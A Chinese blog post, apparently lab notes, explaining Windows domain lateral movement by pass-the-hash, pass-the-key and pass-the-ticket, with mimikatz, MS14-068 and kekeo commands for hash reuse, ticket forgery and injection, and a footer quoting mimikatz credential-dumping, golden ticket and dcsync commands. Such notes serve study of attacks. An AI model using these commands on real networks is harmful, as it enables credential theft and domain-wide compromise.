内网安全 - 域横向 PTH&PTK&PTT

最新推荐文章于 2024-05-20 10:58:11 发布
最新推荐文章于 2024-05-20 10:58:11 发布
阅读量377 收藏 1
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/acepanhuan/article/details/129559417
版权

域横向 PTH&PTK&PTT

基础知识

PTH(pass the hash) : 利用 lm 或 ntlm 的值。
PTT(pass the ticket): 利用的票据凭证 TGT 。
PTK(pass the key) : 利用的 ekeys 、aes256 。

	PTH在内网渗透种是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。
	如果禁用lentlm认证,PsExec无法利用获得的ntml hash进行远程连接,但是使用mimikatz还是可以攻击成功。对于8.1/2012r2,安装补丁kb2871997的win7/2008r/8/2012等,可以利用AES keys代替NT 哈市来实现ptk攻击
总结:KB2871997补丁后的影响
pth:没打补丁用户都可以连接,打了补丁只能administrator连接
ptk:打了补丁所有用户都可以连接,采用aws256连接
参考:https://www.freebuf.com/column/220740.html

PTT票据攻击的协议:Kerberos 协议
---(票据类似于cookie,客户机(浏览器)可以通过cookie也就是票据对服务器进行重新连接)
---客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用krbtgt密码 ,hash作为密钥),发送给 kdc(域控),kdc对用户进行检测,成功之后创建TGT(Ticket-Granting Ticket允许票据)(类似服务器生成cookie)
---将TGT进行加密签名返回给客户机器,只有域用户krbtgt才能读取 kerberos 中TGT数据(服务器将cookie返回给浏览器,这里只有域用户才能读取)
---然后客户机将TGT发送给域控制器KDC请求TGS(票证授权服务)票证,并且对 TGT 进行检测(浏览器再次访问时,服务器对cookie进行检验)
---检测成功之后,将目标服务账户的NTLM以及TGT进行加密,将加密后的结果返回给客户机。(获取到票据后,就可以直接和域内靶机进行连接)

	PTT攻击的部分就不是简单的NTLM认证了,它是利用Kerberos协议进行攻击的,这里就介绍三种常⻅的
攻击方法:MS-068.Golden ticket,SILVER ticket,简单来说就是将连接合法的票据注入到内存中实现连接。
MS14-068基于漏洞,Golden ticket(⻩金票据),SILVER ticket(白银票据)
其中Golden ticket(⻩金票据),SILVER ticket(白银票据)属于权限维持技术
MS14-068造成的危害是允许域内任何一个普通用户,将自己提升至域管理权限。微软给出的补丁是kb3011780

域横向移动PTH传递-Mimikatz

-在域web服务器以本地管理员登陆,打开powershell运行mimikatz
LM与NTLM收集:
在这里插入图片描述
如果是进行PTK传递,就通过:sekurlsa::ekeys获取aes256(这里要安装了KB2871997 补丁后才能进行PTK通过aes256连接)
在这里插入图片描述
当收集到NTLM数据后,有可能内网中其他主机的NTLM值与我们收集到的一致。此时我们就可以使用NTLM进行内网横向渗透。

# mimikatz
privilege::debug

sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
 
sekurlsa::pth(通过PTH连接) /user(用户名):administrator /domain(域名):god /ntlm(哈希密码):ccef208c6485269c20db2cad21734fe7

收集到信息,使用mimikatz pth 建立连接:
在这里插入图片描述
攻击命令上并没有指定IP地址,这是一种随机攻击,IP地址是前期信息收集的,连接时,可以遍历收集到的IP地址,看哪个有回显。
攻击成功反弹回来了一个cmd,在这个cmd中进行连接。
在这里插入图片描述
在弹出的CMD中来执行后续操作,如添加用户或者做权限维持。
在这里插入图片描述
如果IP地址不识别,就换成计算机名,之后就和 at&schtasks一样了,复制文件,执行文件等,收集信息,攻击另外一台主机。

域横向移动PTK传递-mimikatz

PTK aes256 传递,打补丁后的工作组及域连接(是打了kb2871997补丁才能用,很奇怪):

sekurlsa::ekeys    #获取 aes
sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b
#同理,爆破时这三个地方也都可以当做字典

域横向移动 PTT 传递-MS14068(主要)&kekeo&local

利用 MS14068漏洞

该漏洞能实现普通用户直接获取域控system权限:

具体步骤:
1.查看当前 sid 
	whoami/user
2.清空当前机器在中所有凭证(如果有域成员凭证会影响凭证伪造)
	mimikatz #kerberos::purge   清空凭证
	mimikatz# kerberos::list //查看当前机器凭证
	mimikatz# kerberos::ptc 票据文件 //将票据注入到内存中
3.利用ms14-068生成TGT数据
	ms14-058.exe 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
	MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331 -2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45

4.票据注入内存
	mimikatz# kerberos::ptc TGT_mary@god.org.ccache
5.利用 
	dir \\计算机名\C$

6.总结:
	不需要域控的明文或者哈希密码等
	能直接获取域控的system权限
	可以使用一键化的mimikatz

MS14-068下载:

演示:
1.获取SID值
在这里插入图片描述
2.清空当前机器在中所有凭证
mimikatz #kerberos::purge
klist purge在powershell中清空票据
在这里插入图片描述

3.利用ms14-068生成TGT数据 powershell运行
ms14-058.exe 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
在这里插入图片描述
可以看到已经生成了TGT数据 :TGT_mary@god.org.ccache

4.使用 mimikatz将票据注入内存
在这里插入图片描述
5. klist 查看凭据,看是否注入成功。
发现出来了一个凭据
6.

6.利用
在这里插入图片描述

利用kekeo工具
1.生成票据这里需要mary的哈希密码)
./kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"

2.导入票据
	kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi

3. 查看凭证
klist

4. 利用 
dir \\OWA20210CN-God.god.org\c$

kekeo下载

演示:
1.生成票据这里需要mary的哈希密码)在这里插入图片描述
2.导入票据
在这里插入图片描述
3. 查看凭证
在这里插入图片描述
4.利用
dir \OWA20210CN-God.god.org\c$

local 利用本地票据(需要管理员权限)
原理就是假如有原来建立连接的本地票据,导出来利用:
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export            # 收集本地票据
mimikatz # kerberos::ptt xxxxxxxxxx.xxxx.kirbi     # 收集之后导入到内存中

缺陷:ptt只能保持10个小时,如果能拿到10个小时内的凭据,可以成功

Ladon 内网工具: http://k8gege.org/Ladon/

acepanhuan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mimikatz,ms14068
04-02
mimikatz mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 13 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 515764 (00000000:0007deb4) Session : Interactive from 2 User Name : Gentil Kiwi Domain : vm-w7-ult-x SID : S-1-5-21-1982681256-1210654043-1600862990-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult-x * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult-x * Password : waza1234/ ... But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes). If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases Quick usage log privilege::debug sekurlsa sekurlsa::logonpasswords sekurlsa::tickets /export sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd kerberos kerberos::list /export kerberos::ptt c:\chocolate.kirbi kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi crypto crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export vault & lsadump vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\krbtgt /domain:lab.local Build mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are: - for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914) - for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =) Synchronize! - GIT URL is : https://github.com/gentilkiwi/mimikatz.git - SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk - ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip Build the solution - After opening the solution, Build / Build Solution (you can change architecture) - mimikatz is now built and ready to be used! (Win32 / x64) - you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK. ddk2003 With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies) For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after. Follow instructions: - http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme - http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader Licence CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/ Author - Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) - DCSync function in lsadump module was co-writed with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com ) This is a personal development, please respect its philosophy and don't use it for bad things!
内网渗透---ms14068
yc的博客
05-24 2799
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、MS14-068的利用条件?二、利用步骤1.查看服务器是否打补丁2.获取用户的sid值3.删除系统票据4.生成票据5.导入票据6.提权利用总结 前言 ms14-068漏洞主要通过伪造管的TGT,将普通用户权限提权为管权限,以此来控制控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的控服务器中,都可进行利用。 一、MS14-068的利用条件? 1、获取普通用户的账号密码.
渗透之PTH横向攻击
最新发布
qq_55202378的博客
05-20 197
命令行也可以连接RDP,上述指令可能连不成功。直接连接肯定不行,因为没有凭据。输入IP就行,不用输入密码。前提:RDP明文连接过。
AD渗透 | MS14068漏洞原理及复现
m0_57221101的博客
04-18 2582
漏洞编号MS14-068的漏洞,将允许任意用户提升到管理员的权限,补丁编号则是KB3011780 原理分析 ​ 在之前提到白银票据攻击的时候,我们仿佛默认了一个用户可以访问任何的服务。但事实上,往往我们需要控制一些账户使他们不能访问一些服务。这时微软引入了PAC的概念,PAC包含了用户的ID,组ID一类的认证信息。进一步的PAC的分析,请期待我之后会发布的Kerberos协议的抓包分析。如果现在就想要进一步了解请看文末的链接,将导向daiker大佬的文章 ​ 在这里PAC权限验证机制产生漏洞的原因是
MS14-068渗透
bailandawang123的博客
03-10 443
ms14068主要是通过伪造管的tgt,将普通用户提升为管用户,从而控制控。
p68 内网安全-横向 PTH&PTK&PTT 哈希票据传递
weixin_43263566的博客
04-25 1215
p68 内网安全-横向 PTH&PTK&PTT 哈希票据传递
第68天:内网安全-横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,横向PTHPTKPTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
rfb-face-mask.pth
08-09
面部表情识别模型权重 https://github.com/Whiffe/PyTorch-Facial-Expression-Recognition
exp-schp-201908301523-atr.pth
04-16
Self-Correction-Human-Parsing SCHP models exp-schp-201908301523-atr.pth
vox-cpk.pth.tar
09-16
https://gitee.com/nbodyfun/Real_Time_Image_Animation
GPEN-BFR-512-D.pth
04-18
GPEN-BFR-512-D.pth
内网安全横向移动&PTH哈希&PTT票据&PTK密匙&Kerberos&密码喷射
今天是几号的博客
03-27 1214
PTH内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。如果禁用了ntlm认证,PsExec无法利用获得的ntlm hash进行远程连接,但是使用mimikatz还是可以攻击成功。对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012等,可以使用AES keys代替NT hash来实现ptk攻击,总结:KB2871997补丁后的影响。
内网渗透之横向移动PTH&PTT&PTK
m0_62207170的博客
04-23 896
内网渗透之横向移动PTH&PTT&PTK
内网渗透(三十八)之横向移动篇-pass the key 密钥传递攻击(PTK)横向攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-18 713
WinXP/2003/Vista/2008 ,以及未打 KB2871997 补丁之前的 Win7/2008r2/8/2012,这些环境我们都可以使用NTLM哈希传递对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012,可以使用AES keys代替NTLM来进行验证KB2871997:禁止本地管理员账户用于远程连接,这样就无法以本地管理员用户的权限执行wmi、psexec、schtasks、at和访问文件共享。
MS14-068漏洞进行提权
mingyqf的博客
02-24 1704
参考:https://blog.csdn.net/qq_37683287/article/details/120450044 server2008有效 MS14068是一个能够使普通用户提权到控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。 第一步:利用MS14-068伪造生成TGT 第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书 kerberos::ptc TGT_test@moonsec.fbi.ccache 第三步:获取管理员权限。创建
ms14-068的深入分析
zz_strive_2012的专栏
06-17 5084
0×0 背景 初次认识该漏洞是在FreeBuf上对该漏洞的预警《漏洞预警:系统权限提升漏洞(CVE-2014-6324)影响全版本Windows服务器》: 微软今天(2014-11-18)发布了一个紧急补丁,修复了一个影响全部版本Windows服务器的严重漏洞。今天发布的MS14-068漏洞补丁用于解决Microsoft Windows Kerberos KDC漏洞(CVE-2014-
用户更改密码提示拒绝访问_Kerberos用户提权漏洞(MS14068)
weixin_39574928的博客
12-03 698
漏洞信息漏洞名称:Kerberos用户提权漏洞漏洞编号:MS14-068,CVE-2014-6324漏洞原理:Kerberos协议是一种基于第三方可信主机的计算机网络协议,允许两个实体之间在非安全网络环境(可能被窃听、被重放攻击)下,以一种安全的方式证明自己的身份。用户在向Kerberos密钥分发中心(KDC)申请TGT(由票据授权服务产生的身份凭证)时,可以伪造自己的Kerberos...
AD渗透 | PTH&PTK哈希传递攻击手法
m0_57221101的博客
04-13 1143
AD渗透的第二篇,托更一下Kerberos协议的分析文章,等到攻击手法研究明白了,再把协议分析放上来,防止像那些理解不明不白的人写的东西一样祸害人。 发生情况 在高版本的windows server下账号密码不再以明文的方式保存,转而以hash的形式储存,但是假如我们在攻击的时候抓取到了用户hash也可以直接用hash来直接通过验证,模拟用户登录 原理 由于验证原理的问题密码是在本地计算成hash,然后使用hash加密时间戳作为pre-Authention-data来上传,因此如果我们使用自己的脚
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4217
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTHPTH内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
6_hp-karaoke-uvr.pth
01-30
6_hp-karaoke-uvr.pth 是一个文件名,它代表了一种特定的文件格式。6_hp-karaoke-uvr.pth 文件可能是一个经过压缩或编码的音频文件,用于卡拉OK或歌曲演唱的目的。 .pth 是文件扩展名的一种常见形式,通常会提示该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值